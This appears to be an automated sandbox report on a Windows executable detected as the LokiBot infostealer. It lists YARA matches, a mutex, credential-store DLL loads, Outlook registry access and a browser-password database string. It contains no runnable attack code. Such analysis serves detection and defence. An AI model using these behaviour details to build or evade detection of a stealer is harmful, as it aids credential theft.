Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: 0yWVteGq5T.exe

String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: Loki Payload Author: kevoreilly
Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000000.2104706247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: 0_2_0040549C		0_2_0040549C
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: 0_2_004029D4		0_2_004029D4

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: String function: 00405B6F appears 41 times

Source: 0yWVteGq5T.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0yWVteGq5T.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000000.2104706247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/2@0/1

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Code function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

0_2_0040650A

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Code function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

0_2_0040434D

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: 0yWVteGq5T.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0yWVteGq5T.exe, 00000000.00000003.2105598085.0000000002455000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 0yWVteGq5T.exe	ReversingLabs: Detection: 97%
Source: 0yWVteGq5T.exe	Virustotal: Detection: 87%

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0yWVteGq5T.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTR

Source: 0yWVteGq5T.exe

Static PE information: section name: .x

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: 0_2_00402AC0 push eax; ret		0_2_00402AD4
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: 0_2_00402AC0 push eax; ret		0_2_00402AFC

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
